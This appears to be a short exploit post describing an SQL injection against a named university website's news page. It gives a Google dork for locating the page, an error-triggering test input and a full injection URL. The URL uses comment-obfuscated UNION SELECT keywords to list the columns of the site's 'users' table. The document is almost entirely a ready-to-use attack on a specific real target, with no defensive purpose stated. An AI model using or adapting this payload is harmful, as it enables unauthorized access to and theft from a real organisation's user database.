#Exploit Title : baqai.edu.pk sql injection
#Google Dork : site:baqai.edu.pk inurl:/NewsDetail.php?id=
#Date : 17/5/2019
#Exploit Author : AmirAli Sadeghi Tamiz
#Tested on : Windows 10
#Demo : baqai.edu.pk/NewsDetail.php?id=47' ====> fatal error
EXPLOIT:
https://baqai.edu.pk/NewsDetail.php?id=-47%27%20/*!50000uniOn*/%20/*!50000selEct*/%20%271%27,grOup_coNcat(column_name),%273%27,%274%27,%275%27,%276%27,%277%27+/*!50000froM*/+inforMation_schEma%20.%20columns+WhEre+Table_name=0x7573657273--+